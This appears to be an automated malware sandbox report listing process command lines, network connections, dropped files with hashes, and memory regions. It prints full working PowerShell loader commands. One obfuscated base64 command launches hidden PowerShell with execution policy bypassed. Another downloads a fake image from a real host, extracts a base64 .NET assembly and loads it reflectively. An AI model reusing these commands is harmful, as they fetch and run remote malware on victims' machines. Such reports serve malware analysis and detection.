♚DY♛♚N♛♚BD♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBT♛♚HU♛♚YgBz♛♚HQ♛♚cgBp♛♚G4♛♚Zw♛♚o♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚s♛♚C♛♚♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BM♛♚GU♛♚bgBn♛♚HQ♛♚a♛♚♛♚p♛♚Ds♛♚J♛♚Bj♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚QwBv♛♚G4♛♚dgBl♛♚HI♛♚d♛♚Bd♛♚Do♛♚OgBG♛♚HI♛♚bwBt♛♚EI♛♚YQBz♛♚GU♛♚Ng♛♚0♛♚FM♛♚d♛♚By♛♚Gk♛♚bgBn♛♚Cg♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BD♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚Ck♛♚Ow♛♚k♛♚Gw♛♚bwBh♛♚GQ♛♚ZQBk♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQ♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚UgBl♛♚GY♛♚b♛♚Bl♛♚GM♛♚d♛♚Bp♛♚G8♛♚bg♛♚u♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQBd♛♚Do♛♚OgBM♛♚G8♛♚YQBk♛♚Cg♛♚J♛♚Bj♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚p♛♚Ds♛♚J♛♚B0♛♚Hk♛♚c♛♚Bl♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚b♛♚Bv♛♚GE♛♚Z♛♚Bl♛♚GQ♛♚QQBz♛♚HM♛♚ZQBt♛♚GI♛♚b♛♚B5♛♚C4♛♚RwBl♛♚HQ♛♚V♛♚B5♛♚H♛♚♛♚ZQ♛♚o♛♚Cc♛♚QwBs♛♚GE♛♚cwBz♛♚Ew♛♚aQBi♛♚HI♛♚YQBy♛♚Hk♛♚Mw♛♚u♛♚EM♛♚b♛♚Bh♛♚HM♛♚cw♛♚x♛♚Cc♛♚KQ♛♚7♛♚CQ♛♚bQBl♛♚HQ♛♚a♛♚Bv♛♚GQ♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚B0♛♚Hk♛♚c♛♚Bl♛♚C4♛♚RwBl♛♚HQ♛♚TQBl♛♚HQ♛♚a♛♚Bv♛♚GQ♛♚K♛♚♛♚n♛♚FI♛♚dQBu♛♚Cc♛♚KQ♛♚u♛♚Ek♛♚bgB2♛♚G8♛♚awBl♛♚Cg♛♚J♛♚Bu♛♚HU♛♚b♛♚Bs♛♚Cw♛♚I♛♚Bb♛♚G8♛♚YgBq♛♚GU♛♚YwB0♛♚Fs♛♚XQBd♛♚C♛♚♛♚K♛♚♛♚n♛♚GQ♛♚S♛♚Bo♛♚D♛♚♛♚T♛♚Br♛♚E4♛♚TgBV♛♚Gk♛♚OQBu♛♚GM♛♚bgBj♛♚HY♛♚TwBD♛♚DQ♛♚egBO♛♚EM♛♚N♛♚♛♚0♛♚E0♛♚agBJ♛♚HU♛♚TgBq♛♚Fk♛♚dgBM♛♚Ho♛♚c♛♚B3♛♚GQ♛♚S♛♚BS♛♚G8♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GQ♛♚ZgBk♛♚GY♛♚Z♛♚♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚Zg♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚Zg♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bh♛♚GQ♛♚cwBh♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GU♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GM♛♚dQ♛♚n♛♚Ck♛♚KQ♛♚=';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/683/196/original/dll_js.jpg?1701821835';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('ClassLibrary3.Class1');$method = $type.GetMethod('Run').Invoke($null, [object[]] ('dHh0LkNNUi9ncncvOC4zNC44MjIuNjYvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | paste.ee | udp |
| US | 188.114.96.0:443 | paste.ee | tcp |
| US | 8.8.8.8:53 | 0.96.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | uploaddeimagens.com.br | udp |
| US | 188.114.96.0:443 | uploaddeimagens.com.br | tcp |
| US | 8.8.8.8:53 | 198.5.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 66.228.43.8:80 | 66.228.43.8 | tcp |
| US | 8.8.8.8:53 | 8.43.228.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 107.172.31.178:1070 | tcp | |
| US | 8.8.8.8:53 | 178.31.172.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.5.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.78.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.173.189.20.in-addr.arpa | udp |
Files
memory/3240-0-0x000002937C560000-0x000002937C582000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ka45prqq.unx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3240-10-0x00007FFC66A90000-0x00007FFC67551000-memory.dmp
memory/3240-12-0x000002937A300000-0x000002937A310000-memory.dmp
memory/3240-11-0x000002937A300000-0x000002937A310000-memory.dmp
memory/4576-13-0x00007FFC66A90000-0x00007FFC67551000-memory.dmp
memory/4576-23-0x0000015A438B0000-0x0000015A438C0000-memory.dmp
memory/4576-24-0x0000015A2B6C0000-0x0000015A2B6CA000-memory.dmp
memory/4576-25-0x0000015A2B6D0000-0x0000015A2B6D8000-memory.dmp
memory/744-26-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4576-29-0x00007FFC66A90000-0x00007FFC67551000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5caad758326454b5788ec35315c4c304 |
| SHA1 | 3aef8dba8042662a7fcf97e51047dc636b4d4724 |
| SHA256 | 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391 |
| SHA512 | 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f41839a3fe2888c8b3050197bc9a0a05 |
| SHA1 | 0798941aaf7a53a11ea9ed589752890aee069729 |
| SHA256 | 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a |
| SHA512 | 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699 |
memory/3240-34-0x00007FFC66A90000-0x00007FFC67551000-memory.dmp
memory/744-33-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-35-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-37-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-38-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-39-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-40-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-41-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-42-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-44-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-45-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-46-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-47-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-48-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-49-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-50-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-51-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-52-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-53-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-54-0x0000000000400000-0x0000000000482000-memory.dmp